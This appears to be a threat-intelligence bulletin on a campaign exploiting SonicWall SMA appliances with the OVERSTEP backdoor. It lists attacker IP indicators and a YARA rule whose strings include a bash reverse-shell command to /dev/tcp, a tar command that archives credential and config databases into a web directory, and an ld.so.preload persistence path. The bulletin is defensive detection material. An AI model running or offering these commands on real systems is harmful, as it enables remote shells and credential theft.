Today's Core Dump is brought to you by ThreatPerspective

Threat Intelligence

Ongoing SonicWall Secure Mobile Access (SMA) Exploitation Campaign using the OVERSTEP Backdoor

Description

193.149.180.50

Source of VPN sessions where compromise occurred (used by UNC6148 between at least May 2025 and June 2025)

64.52.80.80

Reverse shell IP (used by UNC6148 between at least February 2025 and June 2025)

















Detections

YARA Rule


rule G_Backdoor_OVERSTEP_1 { meta: author = "Google Threat Intelligence Group" date_created = "2025-06-03" date_modified = "2025-06-03" rev = 1 strings: $s1 = "dobackshell" $s2 = "dopasswords" $s3 = "bash -i >& /dev/tcp/%s 0>&1 &" $s4 = "tar czfP /usr/src/EasyAccess/www/htdocs/%s.tgz  /tmp/temp.db /etc/EasyAccess/var/conf/persist.db  /etc/EasyAccess/var/cert; chmod 777" $s5 = "/etc/ld.so.preload" $s6 = "libsamba-errors.so.6" condition: 0x464c457f and filesize < 2MB and 4 of them }



Published: 2025-07-16T14:00:00











© Segmentation Fault . All rights reserved.

Privacy | Terms of Use | Contact Us